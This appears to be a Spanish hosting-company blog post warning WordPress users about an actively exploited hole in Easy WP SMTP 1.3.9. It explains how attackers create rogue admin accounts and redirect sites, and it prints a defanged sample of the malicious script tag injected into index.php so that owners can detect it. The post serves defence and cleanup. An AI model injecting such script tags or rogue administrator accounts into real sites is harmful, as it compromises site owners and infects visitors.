Portada Wordpress Plugin Easy WP SMTP Hackeado – WordPress
El plugin para WordPress Easy WP SMTP ha sido hackeado y si lo tienes instado, debes actualizar lo antes posible.
La versión 1.3.9 de Easy WP SMTP es la versión en la que se ha detectado el problema. Se debe actualizar inmediatamente a la versión 1.3.9.1.
Los ataques se están produciendo desde el pasado fin de semana y todo parece indicar que la vulnerabilidad detectada, sigue bajo un ataque activo, por lo que es importante revisarlo cuanto antes, tanto si se está usando Easy WP SMTP o se tiene instalado en WordPress desactivado.
Como hemos comentado, la vulnerabilidad afecta solo a la versión 1.3.9, no a versiones anteriores o posteriores, pero es aconsejable actualizar a la última versión para curarse en salud.
Si un sitio ha sido vulnerado, se han detectado dos formas distintas de actuación por parte de los atacantes.
La vulnerabilidad permite al atacante registrar un nuevo usuario con el rol de administrador y eso es lo que ocurre en primera instancia.
El primer método de actuación, se limita a crear la cuenta de administrador, pero no realiza ninguna otra acción, por lo que se supone que se trata de un ataque automatizado.
Esto es importante. Si se tiene el plugin instalado y no se detecta ningún problema, hay que revisar que no se hay creado un nuevo usuario con permisos de administrador, ya que si está creado, aunque actualices el plugin el atacante podrá acceder más tarde y realizar las acciones que quiera.
El segundo método de actuación detectado es mucho más agresivo.
Se modifica el siteurl y el home de WordPress, para que apunten URLs con contenido malicioso.
Esto quiere decir que cuando alguien entre en nuestro WordPress, será redirigido a otra web con virus o malware para tratar de infectar a otros usuarios.
Después inyectan en todos los archivos PHP que contengan la cadena index, etiquetas maliciosas <script>, que por supuesto, afectara al archivo index.php de WordPress o cualquier otro complemento que contenga index, como el archivo class-link-reindex-post-service.php, que pertenece al popular plugin Yoast SEO.
Las redirecciones apuntan a dos dominios, al menos por ahora:
Una vez los usuarios son redirigidos a uno de estos dos dominios, se rastrea a estos usuarios para determinar dónde serán redirigidos de nuevo.
Por lo general a sitios en los que se indica que el ordenador tienen un virus llamado Zeus, o similar, y se ofrece ”una solución”, que nunca se debe aceptar si no queremos acabar, y esta vez de verdad, con nuestro equipo totalmente infectado.
Lo primero y principal, entra en tu dominio, si te redirecciona a alguno de los dominios antes indicados, está infectado.
Si no pasa esto pero tiene el plugin instalado, deberás comprobar si tiene algún usuario con permisos de administrador que no conozcas.
Se han detectado dos nombres de usuarios, pero esto puede cambiar en cualquier momento:
También se puede comprobar si se ha estado recibiendo tráfico desde las siguientes direcciones IP:
Ya que son la direcciones que se han detectado hasta ahora.
Revisar todos los archivos index, sobre todo index.php, en busca de scripts maliciosos.
El código que se incluye será parecido a esto:
<script type='text/javascript' async src='hXXps://setforspecialdomain[.]com /in2herg42t2?type=in2&frm=scr&'></script>
Por el momento se desconocen más acciones, pero si se ha instalado una puerta trasera puede ser muy difícil de detectar, por lo que habrá que estar atentos.
Más info aquí (en inglés)
El plugin Easy WP SMTP es muy popular y se encuentra instalado en más de 300 mil instalaciones activas de WordPress.
Se usa para que WordPress envíe los emails a través del protocolo SMTP, en vez de usar PHP, por ejemplo los emails de los formularios de contacto.
Con esto se evita que los emails enviados acaben el la carpeta de Spam, por lo que su uso suele estar muy extendido entre los administradores de WordPress.
No es el único plugin que existe para realizar esta acción, hay mucho otros como por ejemplo WP Mail SMTP, aunque también se puede modificar WordPress para que envíe emails a través de SMTP si necesidad de instalar ningún plugin.
En Hostinet no podemos evitar que un plugin que tengas instalado en WordPress acabe siendo hackeado.
Pero si podemos realizar búsquedas en todos los hosting WordPress que ofrecemos, en busca de cualquier malware instalado, como si fuera el antivirus de tu PC.
Así que si alguien consigue inyectar malware en tu WordPress, lo detectaremos, aislaremos los archivos y te avisaremos para que puedas solucionarlo lo antes posible.
Si buscas un buen hosting para WordPress, podemos ofrecerte varias opciones, pero todas con características comunes, como los discos SSD, panel de control cPanel o certificados SSL gratuitos.
Aquí tienes algunas de las opciones de hosting para WordPress que podemos ofrecerte: